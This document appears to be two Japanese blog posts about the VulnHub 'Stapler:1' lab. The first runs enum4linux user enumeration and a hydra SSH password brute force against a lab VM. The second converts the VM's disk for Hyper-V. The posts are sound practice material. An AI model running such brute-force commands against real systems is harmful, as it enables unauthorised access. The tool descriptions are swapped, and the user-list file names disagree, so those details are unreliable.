概要

以前構築したstaplerの環境に対して、enum4linuxとhydraを使ったパスワードクラックを行います。

補足1：enum4linuxとは

ギリシャ神話に登場する9つの首を持つ怪物から名前を取ったと思われるオンラインパスワードクラッカー。

対応プロトコルはTELNET, FTP, HTTP, SMB, MS-SQL, MYSQL, POSTGRES ,VNC, POP3, IMAP,SSH2, SNMP,Cisco 等 多岐に渡る。

scan.netsecurity.ne.jp

補足2：hydraとは

Windowsのファイル共有やSambaから情報を取得し列挙(enumerate)するツール。

officialstrotect.net

実行結果

youtu.be

実行したコマンド

enum4linux 192.168.1.209
cat user.txt | cut -d "\\" -f 2 | cut -d " " -f 1 > userlist.txt
※user.txtはvi等で作成します。

hydra -L ./username.txt -P ./username.txt 192.168.1.209 ssh

※hydraのオプション（-L、-P）は、大文字だとファイル指定で小文字だと文字列指定になります。

概要

VulnHubは意図的に脆弱性が残された仮想イメージを公開しているプラットフォームです。
「Stapler:1」は、VulnHubにて公開されている仮想イメージの一つです。
この記事では「Stapler:1」をHyper-V上に構築します。

構築

ファイルのダウンロード

Staplerのサイトから「Stapler.zip」をダウンロードします。

（失敗）VHDKをVHDXに変換

以前の方法だと、ダウンロードしたままのファイルではエラーが発生して変換できませんでした。 コンバートの前に少し手順を追加することでコンバートできました。

追加の手順:dsfokダウンロード

こちらのサイトよりdsfokをダウンロードします。

追加の手順:dsfokによるヘッダの書き換え

ダウンロードしたファイルを解凍し、以下のコマンドを実行します。（コマンドプロンプト使用）

dsfo.exe "「.vmdk」ファイルのパス" 512 1024 "descriptor.txt"

コマンド実行後、「descriptor.txt」というファイルが作成されます。ファイルをメモ帳で開き、以下の部分をコメントアウトします。

descriptor.txtの内容

# Disk DescriptorFile
version=1
CID=97c48ede
parentCID=ffffffff
createType="streamOptimized"

# Extent description
RDONLY 41943040 SPARSE "generated-stream.vmdk"

# The Disk Data Base
#DDB

ddb.adapterType = "lsilogic"
ddb.geometry.cylinders = "2610"
ddb.geometry.heads = "255"
ddb.geometry.sectors = "63"
ddb.longContentID = "3d691b663a2d01981d1600b2666014ac"
#ddb.toolsInstallType = "4"•••ここをコメントアウト
ddb.toolsVersion = "10247"
ddb.virtualHWVersion = "12"

上記の編集後、以下のコマンドを実行します。

dsfi.exe "「.vmdk」ファイルのパス" 512 1024 "descriptor.txt"

VHDKをVHDXに変換

上記実施後は以前と同様にコンバートが可能です。（PowerShell使用）

Import-Module "C:\Program Files\Microsoft Virtual Machine Converter\MvmcCmdlet.psd1"

 

ConvertTo-MvmcVirtualHardDisk -SourceLiteralPath 「.vmdk」ファイルのパス -VhdType DynamicHardDisk -VhdFormat Vhdx -Verbose

VHDXに変換後は通常の仮想マシンの作成と同様の手順で構築可能でした。 

参考にさせていただいたサイト

stackoverflow.com

kb.seeck.jp

blog.myanote.com

www.mysysadmintips.com